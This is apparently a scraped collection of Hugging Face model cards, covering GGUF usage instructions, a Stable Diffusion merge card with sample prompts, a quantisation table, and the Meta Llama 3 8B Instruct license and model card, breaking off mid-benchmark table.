./main -ngl 35 -m internlm2-1_8b.IQ3_M.gguf --color -c 32768 --temp 0.7 --repeat_penalty 1.1 -n -1 -p "<s>[INST] {{prompt\}} [/INST]"
```
Change `-ngl 32` to the number of layers to offload to GPU. Remove it if you don't have GPU acceleration.
Change `-c 32768` to the desired sequence length. For extended sequence models - eg 8K, 16K, 32K - the necessary RoPE scaling parameters are read from the GGUF file and set by llama.cpp automatically. Note that longer sequence lengths require much more resources, so you may need to reduce this value.
If you want to have a chat-style conversation, replace the `-p <PROMPT>` argument with `-i -ins`
For other parameters and how to use them, please refer to [the llama.cpp documentation](https://github.com/ggerganov/llama.cpp/blob/master/examples/main/README.md)
- **Option B** - Running in `text-generation-webui`
Further instructions can be found in the text-generation-webui documentation, here: [text-generation-webui/docs/04 ‐ Model Tab.md](https://github.com/oobabooga/text-generation-webui/blob/main/docs/04%20-%20Model%20Tab.md#llamacpp).
- **Option C** - Running from Python code
You can use GGUF models from Python using the [llama-cpp-python](https://github.com/abetlen/llama-cpp-python) or [ctransformers](https://github.com/marella/ctransformers) libraries. Note that at the time of writing (Nov 27th 2023), ctransformers has not been updated for some time and is not compatible with some recent models. Therefore I recommend you use llama-cpp-python.
### How to load this model in Python code, using llama-cpp-python
For full documentation, please see: [llama-cpp-python docs](https://abetlen.github.io/llama-cpp-python/).
#### First install the package
Run one of the following commands, according to your system:
```shell
# Base ctransformers with no GPU acceleration
pip install llama-cpp-python
# With NVidia CUDA acceleration
CMAKE_ARGS="-DLLAMA_CUBLAS=on" pip install llama-cpp-python
# Or with OpenBLAS acceleration
CMAKE_ARGS="-DLLAMA_BLAS=ON -DLLAMA_BLAS_VENDOR=OpenBLAS" pip install llama-cpp-python
# Or with CLBLast acceleration
CMAKE_ARGS="-DLLAMA_CLBLAST=on" pip install llama-cpp-python
# Or with AMD ROCm GPU acceleration (Linux only)
CMAKE_ARGS="-DLLAMA_HIPBLAS=on" pip install llama-cpp-python
# Or with Metal GPU acceleration for macOS systems only
CMAKE_ARGS="-DLLAMA_METAL=on" pip install llama-cpp-python
# In windows, to set the variables CMAKE_ARGS in PowerShell, follow this format; eg for NVidia CUDA:
$env:CMAKE_ARGS = "-DLLAMA_OPENBLAS=on"
pip install llama-cpp-python
```
#### Simple llama-cpp-python example code
```python
from llama_cpp import Llama
# Set gpu_layers to the number of layers to offload to GPU. Set to 0 if no GPU acceleration is available on your system.
llm = Llama(
model_path="./internlm2-1_8b.IQ3_M.gguf", # Download the model file first
n_ctx=32768, # The max sequence length to use - note that longer sequence lengths require much more resources
n_threads=8, # The number of CPU threads to use, tailor to your system and the resulting performance
n_gpu_layers=35 # The number of layers to offload to GPU, if you have GPU acceleration available
)
# Simple inference example
output = llm(
"<s>[INST] {{prompt}} [/INST]", # Prompt
max_tokens=512, # Generate up to 512 tokens
stop=["</s>"], # Example stop token - not necessarily correct for this specific model! Please check before using.
echo=True # Whether to echo the prompt
)
# Chat Completion API
llm = Llama(model_path="./internlm2-1_8b.IQ3_M.gguf", chat_format="llama-2") # Set chat_format according to the model you are using
llm.create_chat_completion(
messages = [
{{"role": "system", "content": "You are a story writing assistant."}},
{{
"role": "user",
"content": "Write a story about llamas."
}}
]
)
```
- **Option D** - Running with LangChain
Here are guides on using llama-cpp-python and ctransformers with LangChain:
* [LangChain + llama-cpp-python](https://python.langchain.com/docs/integrations/llms/llamacpp)
* [LangChain + ctransformers](https://python.langchain.com/docs/integrations/providers/ctransformers)
## Configurations
The configuration info are in `smash_config.json`.
## Credits & License
The license of the smashed model follows the license of the original model. Please check the license of the original model before using this model which provided the base model. The license of the `pruna-engine` is [here](https://pypi.org/project/pruna-engine/) on Pypi.
## Want to compress other models?
- Contact us and tell us which model to compress next [here](https://www.pruna.ai/contact).
- Request access to easily compress your own AI models [here](https://z0halsaff74.typeform.com/pruna-access?typeform-source=www.pruna.ai). |
Yntec/RetroArt | Yntec | "2024-05-13T12:34:32Z" | 3,648 | 1 | diffusers | [
"diffusers",
"safetensors",
"Retro",
"Art",
"Vintage",
"Elldreth",
"DucHaiten",
"stable-diffusion",
"stable-diffusion-diffusers",
"text-to-image",
"license:creativeml-openrail-m",
"autotrain_compatible",
"endpoints_compatible",
"diffusers:StableDiffusionPipeline",
"region:us"
] | text-to-image | "2024-05-13T10:55:09Z" | ---
license: creativeml-openrail-m
library_name: diffusers
pipeline_tag: text-to-image
tags:
- Retro
- Art
- Vintage
- Elldreth
- DucHaiten
- stable-diffusion
- stable-diffusion-diffusers
- diffusers
- text-to-image
---
# Retro Art
Samples and prompts:

(Click for larger)
Top left: Girls portrait. worn out washed Retro Stock colors Closeup detailed eyes faces movie TRAILER TV. Santa clause and daughters enjoying tacos with enchiladas. sitting with a pretty cute little girl, Art Christmas Theme by Gil_Elvgren and Haddon_Sundblom. Posing
Top right: 60s NEON COLORS movie still, pretty school woman Cinematic with cleavage hugging handsome man, classroom, Uniforms, blackboard. Pinup. He wears a backpack, bokeh
Bottom left: pretty CUTE little girl sitting in toy room illustration, 1941 ponytail, HOLDING Sega Nintendo CONTROLLER, PC MONITOR screen, Magazine ad, Iconic. beautiful detailed, unreal 5, daz, hyperrealistic, octane render, Painterly soft brush, shy modest pleasing palette, textured, detailed, flawless, perfect, mural - sized chibi character design key visual symmetrical headshot portrait by yoshitomo nara
Bottom right (prompt by digiplay): 1girl,night, waterfall, white wavy hair Angel 22y.o, (realistic:2),Mucha,4k,rabbits and birds, close up,
Original pages:
https://huggingface.co/DucHaiten/DucHaitenAIart (beta-v6.0.ckpt)
https://huggingface.co/LibreSD/Elldreth (Elldreth's_Retro_Mix.safetensors)
# Recipe:
- SuperMerger Weight sum MBW 1,1,1,1,0,0,0,1,1,1,1,1,1,0,0,0,0,1,1,1,0,0,0,0,0,0
Model A: elldrethsRetroMix (https://huggingface.co/Yntec/ElldrethsRetroMix/resolve/main/elldrethsRetroMix.safetensors)
Model B: DucHaitenAIart-beta (https://huggingface.co/Yntec/DucHaitenAIart-beta/resolve/main/beta-v6.0-no-emaVAE.safetensors)
Output: RetroArt |
PassionFriend/5FeuyzGi3S8EwWGmvmeGoNG3nTgJppgaT9XnYaKExR5ZtUuq_vgg | PassionFriend | "2024-03-01T06:36:28Z" | 3,646 | 0 | keras | [
"keras",
"region:us"
] | null | "2024-02-05T18:27:44Z" | Entry not found |
mradermacher/bangla-llama-7b-instruct-v0.1-GGUF | mradermacher | "2024-06-09T15:14:36Z" | 3,642 | 0 | transformers | [
"transformers",
"gguf",
"bn",
"en",
"base_model:BanglaLLM/bangla-llama-7b-instruct-v0.1",
"license:llama2",
"endpoints_compatible",
"region:us"
] | null | "2024-06-09T14:50:06Z" | ---
base_model: BanglaLLM/bangla-llama-7b-instruct-v0.1
language:
- bn
- en
library_name: transformers
license: llama2
quantized_by: mradermacher
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/BanglaLLM/bangla-llama-7b-instruct-v0.1
<!-- provided-files -->
weighted/imatrix quants are available at https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-i1-GGUF
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.Q2_K.gguf) | Q2_K | 2.7 | |
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.IQ3_XS.gguf) | IQ3_XS | 3.0 | |
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.IQ3_S.gguf) | IQ3_S | 3.1 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.Q3_K_S.gguf) | Q3_K_S | 3.1 | |
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.IQ3_M.gguf) | IQ3_M | 3.3 | |
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.Q3_K_M.gguf) | Q3_K_M | 3.5 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.Q3_K_L.gguf) | Q3_K_L | 3.8 | |
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.IQ4_XS.gguf) | IQ4_XS | 3.9 | |
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.Q4_K_S.gguf) | Q4_K_S | 4.1 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.Q4_K_M.gguf) | Q4_K_M | 4.3 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.Q5_K_S.gguf) | Q5_K_S | 4.9 | |
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.Q5_K_M.gguf) | Q5_K_M | 5.0 | |
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.Q6_K.gguf) | Q6_K | 5.8 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.Q8_0.gguf) | Q8_0 | 7.4 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.f16.gguf) | f16 | 13.9 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
NurtureAI/Meta-Llama-3-8B-Instruct-32k | NurtureAI | "2024-04-22T18:52:28Z" | 3,640 | 7 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"facebook",
"meta",
"pytorch",
"llama-3",
"conversational",
"en",
"license:other",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2024-04-22T18:42:12Z" | ---
language:
- en
pipeline_tag: text-generation
tags:
- facebook
- meta
- pytorch
- llama
- llama-3
license: other
license_name: llama3
license_link: LICENSE
extra_gated_prompt: >-
### META LLAMA 3 COMMUNITY LICENSE AGREEMENT
Meta Llama 3 Version Release Date: April 18, 2024
"Agreement" means the terms and conditions for use, reproduction, distribution and modification of the
Llama Materials set forth herein.
"Documentation" means the specifications, manuals and documentation accompanying Meta Llama 3
distributed by Meta at https://llama.meta.com/get-started/.
"Licensee" or "you" means you, or your employer or any other person or entity (if you are entering into
this Agreement on such person or entity’s behalf), of the age required under applicable laws, rules or
regulations to provide legal consent and that has legal authority to bind your employer or such other
person or entity if you are entering in this Agreement on their behalf.
"Meta Llama 3" means the foundational large language models and software and algorithms, including
machine-learning model code, trained model weights, inference-enabling code, training-enabling code,
fine-tuning enabling code and other elements of the foregoing distributed by Meta at
https://llama.meta.com/llama-downloads.
"Llama Materials" means, collectively, Meta’s proprietary Meta Llama 3 and Documentation (and any
portion thereof) made available under this Agreement.
"Meta" or "we" means Meta Platforms Ireland Limited (if you are located in or, if you are an entity, your
principal place of business is in the EEA or Switzerland) and Meta Platforms, Inc. (if you are located
outside of the EEA or Switzerland).
1. License Rights and Redistribution.
a. Grant of Rights. You are granted a non-exclusive, worldwide, non-transferable and royalty-free
limited license under Meta’s intellectual property or other rights owned by Meta embodied in the Llama
Materials to use, reproduce, distribute, copy, create derivative works of, and make modifications to the
Llama Materials.
b. Redistribution and Use.
i. If you distribute or make available the Llama Materials (or any derivative works
thereof), or a product or service that uses any of them, including another AI model, you shall (A) provide
a copy of this Agreement with any such Llama Materials; and (B) prominently display “Built with Meta
Llama 3” on a related website, user interface, blogpost, about page, or product documentation. If you
use the Llama Materials to create, train, fine tune, or otherwise improve an AI model, which is
distributed or made available, you shall also include “Llama 3” at the beginning of any such AI model
name.
ii. If you receive Llama Materials, or any derivative works thereof, from a Licensee as part
of an integrated end user product, then Section 2 of this Agreement will not apply to you.
iii. You must retain in all copies of the Llama Materials that you distribute the following
attribution notice within a “Notice” text file distributed as a part of such copies: “Meta Llama 3 is
licensed under the Meta Llama 3 Community License, Copyright © Meta Platforms, Inc. All Rights
Reserved.”
iv. Your use of the Llama Materials must comply with applicable laws and regulations
(including trade compliance laws and regulations) and adhere to the Acceptable Use Policy for the Llama
Materials (available at https://llama.meta.com/llama3/use-policy), which is hereby incorporated by
reference into this Agreement.
v. You will not use the Llama Materials or any output or results of the Llama Materials to
improve any other large language model (excluding Meta Llama 3 or derivative works thereof).
2. Additional Commercial Terms. If, on the Meta Llama 3 version release date, the monthly active users
of the products or services made available by or for Licensee, or Licensee’s affiliates, is greater than 700
million monthly active users in the preceding calendar month, you must request a license from Meta,
which Meta may grant to you in its sole discretion, and you are not authorized to exercise any of the
rights under this Agreement unless or until Meta otherwise expressly grants you such rights.
3. Disclaimer of Warranty. UNLESS REQUIRED BY APPLICABLE LAW, THE LLAMA MATERIALS AND ANY
OUTPUT AND RESULTS THEREFROM ARE PROVIDED ON AN “AS IS” BASIS, WITHOUT WARRANTIES OF
ANY KIND, AND META DISCLAIMS ALL WARRANTIES OF ANY KIND, BOTH EXPRESS AND IMPLIED,
INCLUDING, WITHOUT LIMITATION, ANY WARRANTIES OF TITLE, NON-INFRINGEMENT,
MERCHANTABILITY, OR FITNESS FOR A PARTICULAR PURPOSE. YOU ARE SOLELY RESPONSIBLE FOR
DETERMINING THE APPROPRIATENESS OF USING OR REDISTRIBUTING THE LLAMA MATERIALS AND
ASSUME ANY RISKS ASSOCIATED WITH YOUR USE OF THE LLAMA MATERIALS AND ANY OUTPUT AND
RESULTS.
4. Limitation of Liability. IN NO EVENT WILL META OR ITS AFFILIATES BE LIABLE UNDER ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, TORT, NEGLIGENCE, PRODUCTS LIABILITY, OR OTHERWISE, ARISING
OUT OF THIS AGREEMENT, FOR ANY LOST PROFITS OR ANY INDIRECT, SPECIAL, CONSEQUENTIAL,
INCIDENTAL, EXEMPLARY OR PUNITIVE DAMAGES, EVEN IF META OR ITS AFFILIATES HAVE BEEN ADVISED
OF THE POSSIBILITY OF ANY OF THE FOREGOING.
5. Intellectual Property.
a. No trademark licenses are granted under this Agreement, and in connection with the Llama
Materials, neither Meta nor Licensee may use any name or mark owned by or associated with the other
or any of its affiliates, except as required for reasonable and customary use in describing and
redistributing the Llama Materials or as set forth in this Section 5(a). Meta hereby grants you a license to
use “Llama 3” (the “Mark”) solely as required to comply with the last sentence of Section 1.b.i. You will
comply with Meta’s brand guidelines (currently accessible at
https://about.meta.com/brand/resources/meta/company-brand/ ). All goodwill arising out of your use
of the Mark will inure to the benefit of Meta.
b. Subject to Meta’s ownership of Llama Materials and derivatives made by or for Meta, with
respect to any derivative works and modifications of the Llama Materials that are made by you, as
between you and Meta, you are and will be the owner of such derivative works and modifications.
c. If you institute litigation or other proceedings against Meta or any entity (including a
cross-claim or counterclaim in a lawsuit) alleging that the Llama Materials or Meta Llama 3 outputs or
results, or any portion of any of the foregoing, constitutes infringement of intellectual property or other
rights owned or licensable by you, then any licenses granted to you under this Agreement shall
terminate as of the date such litigation or claim is filed or instituted. You will indemnify and hold
harmless Meta from and against any claim by any third party arising out of or related to your use or
distribution of the Llama Materials.
6. Term and Termination. The term of this Agreement will commence upon your acceptance of this
Agreement or access to the Llama Materials and will continue in full force and effect until terminated in
accordance with the terms and conditions herein. Meta may terminate this Agreement if you are in
breach of any term or condition of this Agreement. Upon termination of this Agreement, you shall delete
and cease use of the Llama Materials. Sections 3, 4 and 7 shall survive the termination of this
Agreement.
7. Governing Law and Jurisdiction. This Agreement will be governed and construed under the laws of
the State of California without regard to choice of law principles, and the UN Convention on Contracts
for the International Sale of Goods does not apply to this Agreement. The courts of California shall have
exclusive jurisdiction of any dispute arising out of this Agreement.
### Meta Llama 3 Acceptable Use Policy
Meta is committed to promoting safe and fair use of its tools and features, including Meta Llama 3. If you
access or use Meta Llama 3, you agree to this Acceptable Use Policy (“Policy”). The most recent copy of
this policy can be found at [https://llama.meta.com/llama3/use-policy](https://llama.meta.com/llama3/use-policy)
#### Prohibited Uses
We want everyone to use Meta Llama 3 safely and responsibly. You agree you will not use, or allow
others to use, Meta Llama 3 to:
1. Violate the law or others’ rights, including to:
1. Engage in, promote, generate, contribute to, encourage, plan, incite, or further illegal or unlawful activity or content, such as:
1. Violence or terrorism
2. Exploitation or harm to children, including the solicitation, creation, acquisition, or dissemination of child exploitative content or failure to report Child Sexual Abuse Material
3. Human trafficking, exploitation, and sexual violence
4. The illegal distribution of information or materials to minors, including obscene materials, or failure to employ legally required age-gating in connection with such information or materials.
5. Sexual solicitation
6. Any other criminal activity
2. Engage in, promote, incite, or facilitate the harassment, abuse, threatening, or bullying of individuals or groups of individuals
3. Engage in, promote, incite, or facilitate discrimination or other unlawful or harmful conduct in the provision of employment, employment benefits, credit, housing, other economic benefits, or other essential goods and services
4. Engage in the unauthorized or unlicensed practice of any profession including, but not limited to, financial, legal, medical/health, or related professional practices
5. Collect, process, disclose, generate, or infer health, demographic, or other sensitive personal or private information about individuals without rights and consents required by applicable laws
6. Engage in or facilitate any action or generate any content that infringes, misappropriates, or otherwise violates any third-party rights, including the outputs or results of any products or services using the Llama Materials
7. Create, generate, or facilitate the creation of malicious code, malware, computer viruses or do anything else that could disable, overburden, interfere with or impair the proper working, integrity, operation or appearance of a website or computer system
2. Engage in, promote, incite, facilitate, or assist in the planning or development of activities that present a risk of death or bodily harm to individuals, including use of Meta Llama 3 related to the following:
1. Military, warfare, nuclear industries or applications, espionage, use for materials or activities that are subject to the International Traffic Arms Regulations (ITAR) maintained by the United States Department of State
2. Guns and illegal weapons (including weapon development)
3. Illegal drugs and regulated/controlled substances
4. Operation of critical infrastructure, transportation technologies, or heavy machinery
5. Self-harm or harm to others, including suicide, cutting, and eating disorders
6. Any content intended to incite or promote violence, abuse, or any infliction of bodily harm to an individual
3. Intentionally deceive or mislead others, including use of Meta Llama 3 related to the following:
1. Generating, promoting, or furthering fraud or the creation or promotion of disinformation
2. Generating, promoting, or furthering defamatory content, including the creation of defamatory statements, images, or other content
3. Generating, promoting, or further distributing spam
4. Impersonating another individual without consent, authorization, or legal right
5. Representing that the use of Meta Llama 3 or outputs are human-generated
6. Generating or facilitating false online engagement, including fake reviews and other means of fake online engagement
4. Fail to appropriately disclose to end users any known dangers of your AI system
Please report any violation of this Policy, software “bug,” or other problems that could lead to a violation
of this Policy through one of the following means:
* Reporting issues with the model: [https://github.com/meta-llama/llama3](https://github.com/meta-llama/llama3)
* Reporting risky content generated by the model:
developers.facebook.com/llama_output_feedback
* Reporting bugs and security concerns: facebook.com/whitehat/info
* Reporting violations of the Acceptable Use Policy or unlicensed uses of Meta Llama 3: [email protected]
extra_gated_fields:
First Name: text
Last Name: text
Date of birth: date_picker
Country: country
Affiliation: text
geo: ip_location
By clicking Submit below I accept the terms of the license and acknowledge that the information I provide will be collected stored processed and shared in accordance with the Meta Privacy Policy: checkbox
extra_gated_description: The information you provide will be collected, stored, processed and shared in accordance with the [Meta Privacy Policy](https://www.facebook.com/privacy/policy/).
extra_gated_button_content: Submit
---
## Model Details
Meta developed and released the Meta Llama 3 family of large language models (LLMs), a collection of pretrained and instruction tuned generative text models in 8 and 70B sizes. The Llama 3 instruction tuned models are optimized for dialogue use cases and outperform many of the available open source chat models on common industry benchmarks. Further, in developing these models, we took great care to optimize helpfulness and safety.
**Model developers** Meta
**Variations** Llama 3 comes in two sizes — 8B and 70B parameters — in pre-trained and instruction tuned variants.
**Input** Models input text only.
**Output** Models generate text and code only.
**Model Architecture** Llama 3 is an auto-regressive language model that uses an optimized transformer architecture. The tuned versions use supervised fine-tuning (SFT) and reinforcement learning with human feedback (RLHF) to align with human preferences for helpfulness and safety.
<table>
<tr>
<td>
</td>
<td><strong>Training Data</strong>
</td>
<td><strong>Params</strong>
</td>
<td><strong>Context length</strong>
</td>
<td><strong>GQA</strong>
</td>
<td><strong>Token count</strong>
</td>
<td><strong>Knowledge cutoff</strong>
</td>
</tr>
<tr>
<td rowspan="2" >Llama 3
</td>
<td rowspan="2" >A new mix of publicly available online data.
</td>
<td>8B
</td>
<td>8k
</td>
<td>Yes
</td>
<td rowspan="2" >15T+
</td>
<td>March, 2023
</td>
</tr>
<tr>
<td>70B
</td>
<td>8k
</td>
<td>Yes
</td>
<td>December, 2023
</td>
</tr>
</table>
**Llama 3 family of models**. Token counts refer to pretraining data only. Both the 8 and 70B versions use Grouped-Query Attention (GQA) for improved inference scalability.
**Model Release Date** April 18, 2024.
**Status** This is a static model trained on an offline dataset. Future versions of the tuned models will be released as we improve model safety with community feedback.
**License** A custom commercial license is available at: [https://llama.meta.com/llama3/license](https://llama.meta.com/llama3/license)
Where to send questions or comments about the model Instructions on how to provide feedback or comments on the model can be found in the model [README](https://github.com/meta-llama/llama3). For more technical information about generation parameters and recipes for how to use Llama 3 in applications, please go [here](https://github.com/meta-llama/llama-recipes).
## Intended Use
**Intended Use Cases** Llama 3 is intended for commercial and research use in English. Instruction tuned models are intended for assistant-like chat, whereas pretrained models can be adapted for a variety of natural language generation tasks.
**Out-of-scope** Use in any manner that violates applicable laws or regulations (including trade compliance laws). Use in any other way that is prohibited by the Acceptable Use Policy and Llama 3 Community License. Use in languages other than English**.
**Note: Developers may fine-tune Llama 3 models for languages beyond English provided they comply with the Llama 3 Community License and the Acceptable Use Policy.
## How to use
This repository contains two versions of Meta-Llama-3-8B-Instruct, for use with transformers and with the original `llama3` codebase.
### Use with transformers
You can run conversational inference using the Transformers pipeline abstraction, or by leveraging the Auto classes with the `generate()` function. Let's see examples of both.
#### Transformers pipeline
```python
import transformers
import torch
model_id = "meta-llama/Meta-Llama-3-8B-Instruct"
pipeline = transformers.pipeline(
"text-generation",
model=model_id,
model_kwargs={"torch_dtype": torch.bfloat16},
device="auto",
)
messages = [
{"role": "system", "content": "You are a pirate chatbot who always responds in pirate speak!"},
{"role": "user", "content": "Who are you?"},
]
prompt = pipeline.tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
terminators = [
pipeline.tokenizer.eos_token_id,
pipeline.tokenizer.convert_tokens_to_ids("<|eot_id|>")
]
outputs = pipeline(
prompt,
max_new_tokens=256,
eos_token_id=terminators,
do_sample=True,
temperature=0.6,
top_p=0.9,
)
print(outputs[0]["generated_text"][len(prompt):])
```
#### Transformers AutoModelForCausalLM
```python
from transformers import AutoTokenizer, AutoModelForCausalLM
import torch
model_id = "meta-llama/Meta-Llama-3-8B-Instruct"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(
model_id,
torch_dtype=torch.bfloat16,
device_map="auto",
)
messages = [
{"role": "system", "content": "You are a pirate chatbot who always responds in pirate speak!"},
{"role": "user", "content": "Who are you?"},
]
input_ids = tokenizer.apply_chat_template(
messages,
add_generation_prompt=True,
return_tensors="pt"
).to(model.device)
terminators = [
tokenizer.eos_token_id,
tokenizer.convert_tokens_to_ids("<|eot_id|>")
]
outputs = model.generate(
input_ids,
max_new_tokens=256,
eos_token_id=terminators,
do_sample=True,
temperature=0.6,
top_p=0.9,
)
response = outputs[0][input_ids.shape[-1]:]
print(tokenizer.decode(response, skip_special_tokens=True))
```
### Use with `llama3`
Please, follow the instructions in the [repository](https://github.com/meta-llama/llama3)
To download Original checkpoints, see the example command below leveraging `huggingface-cli`:
```
huggingface-cli download meta-llama/Meta-Llama-3-8B-Instruct --include "original/*" --local-dir Meta-Llama-3-8B-Instruct
```
For Hugging Face support, we recommend using transformers or TGI, but a similar command works.
## Hardware and Software
**Training Factors** We used custom training libraries, Meta's Research SuperCluster, and production clusters for pretraining. Fine-tuning, annotation, and evaluation were also performed on third-party cloud compute.
**Carbon Footprint Pretraining utilized a cumulative** 7.7M GPU hours of computation on hardware of type H100-80GB (TDP of 700W). Estimated total emissions were 2290 tCO2eq, 100% of which were offset by Meta’s sustainability program.
<table>
<tr>
<td>
</td>
<td><strong>Time (GPU hours)</strong>
</td>
<td><strong>Power Consumption (W)</strong>
</td>
<td><strong>Carbon Emitted(tCO2eq)</strong>
</td>
</tr>
<tr>
<td>Llama 3 8B
</td>
<td>1.3M
</td>
<td>700
</td>
<td>390
</td>
</tr>
<tr>
<td>Llama 3 70B
</td>
<td>6.4M
</td>
<td>700
</td>
<td>1900
</td>
</tr>
<tr>
<td>Total
</td>
<td>7.7M
</td>
<td>
</td>
<td>2290
</td>
</tr>
</table>
**CO2 emissions during pre-training**. Time: total GPU time required for training each model. Power Consumption: peak power capacity per GPU device for the GPUs used adjusted for power usage efficiency. 100% of the emissions are directly offset by Meta's sustainability program, and because we are openly releasing these models, the pretraining costs do not need to be incurred by others.
## Training Data
**Overview** Llama 3 was pretrained on over 15 trillion tokens of data from publicly available sources. The fine-tuning data includes publicly available instruction datasets, as well as over 10M human-annotated examples. Neither the pretraining nor the fine-tuning datasets include Meta user data.
**Data Freshness** The pretraining data has a cutoff of March 2023 for the 7B and December 2023 for the 70B models respectively.
## Benchmarks
In this section, we report the results for Llama 3 models on standard automatic benchmarks. For all the evaluations, we use our internal evaluations library. For details on the methodology see [here](https://github.com/meta-llama/llama3/blob/main/eval_methodology.md).
### Base pretrained models
<table>
<tr>
<td><strong>Category</strong>
</td>
<td><strong>Benchmark</strong>
</td>
<td><strong>Llama 3 8B</strong>
</td>
<td><strong>Llama2 7B</strong>
</td>
<td><strong>Llama2 13B</strong>
</td>
<td><strong>Llama 3 70B</strong>
</td>
<td><strong>Llama2 70B</strong>
</td>
</tr>
<tr>
<td rowspan="6" >General
</td>
<td>MMLU (5-shot)
</td>
<td>66.6
</td>
<td>45.7
</td>
<td>53.8
</td>
<td>79.5
</td>
<td>69.7
</td>
</tr>
<tr>
<td>AGIEval English (3-5 shot)
</td>
<td>45.9
</td>
<td>28.8
</td>
<td>38.7
</td>
<td>63.0
</td>
<td>54.8
</td>
</tr>
<tr>
<td>CommonSenseQA (7-shot)
</td>
<td>72.6
</td>
<td>57.6
</td>
<td>67.6
</td>
<td>83.8
</td>
<td>78.7
</td>
</tr>
<tr>
<td>Winogrande (5-shot)
</td>
<td>76.1
</td>
<td>73.3
</td>
<td>75.4
</td>
<td>83.1
</td>
<td>81.8
</td>
</tr>
<tr>
<td>BIG-Bench Hard (3-shot, CoT)
</td>
<td>61.1
</td>
<td>38.1
</td>
<td>47.0
</td>
<td>81.3
</td>
<td>65.7
</td>
</tr>
<tr>
<td>ARC-Challenge (25-shot)
</td>
<td>78.6
</td>
<td>53.7
</td>
<td>67.6
</td>
<td>93.0
</td>
<td>85.3
</td>
</tr>
<tr>
<td>Knowledge reasoning
</td>
<td>TriviaQA-Wiki (5-shot)
</td>
<td>78.5
</td>
<td>72.1
</td>
<td>79.6
</td>
<td>89.7
</td>
<td>87.5
</td>
</tr>
<tr>
<td rowspan="4" >Reading comprehension
</td>
<td>SQuAD (1-shot)
</td>
<td>76.4
</td>
<td>72.2
</td>
<td>72.1
</td>
<td>85.6
</td>
<td>82.6
</td>
</tr>
<tr>
<td>QuAC (1-shot, F1)
</td>
<td>44.4
</td>
<td>39.6
</td>
<td>44.9
</td>
<td>51.1
</td>
<td>49.4
</td>
</tr>
<tr>
<td>BoolQ (0-shot)
</td>
<td>75.7
</td>
<td>65.5
</td>
<td>66.9
</td>
<td>79.0
</td>
<td>73.1
</td>
</tr>
<tr>
<td>DROP (3-shot, F1)
</td>
<td>58.4
</td>
<td>37.9
</td>
<td>49.8
</td>
<td>79.7
</td>
<td>70.2
</td>
</tr>
</table>
### Instruction tuned models
<table>
<tr>
<td><strong>Benchmark</strong>
</td>
<td><strong>Llama 3 8B</strong>
</td>
<td><strong>Llama 2 7B</strong>
</td>
<td><strong>Llama 2 13B</strong>
</td>
<td><strong>Llama 3 70B</strong>
</td>
<td><strong>Llama 2 70B</strong>
</td>
</tr>
<tr>
<td>MMLU (5-shot)
</td>
<td>68.4
</td>
<td>34.1
</td>
<td>47.8
</td>
<td>82.0
</td>
<td>52.9
</td>
</tr>
<tr>
<td>GPQA (0-shot)
</td>
<td>34.2
</td>
<td>21.7
</td>
<td>22.3
</td>
<td>39.5
</td>
<td>21.0
</td>
</tr>
<tr>
<td>HumanEval (0-shot)
</td>
<td>62.2
</td>
<td>7.9
</td>
<td>14.0
</td>
<td>81.7
